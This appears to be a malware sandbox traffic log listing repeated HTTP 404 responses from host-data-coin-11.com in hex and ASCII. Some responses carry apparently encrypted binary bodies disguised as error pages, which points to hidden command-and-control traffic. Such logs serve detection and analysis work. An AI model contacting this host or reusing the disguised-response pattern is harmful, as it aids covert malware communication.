                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
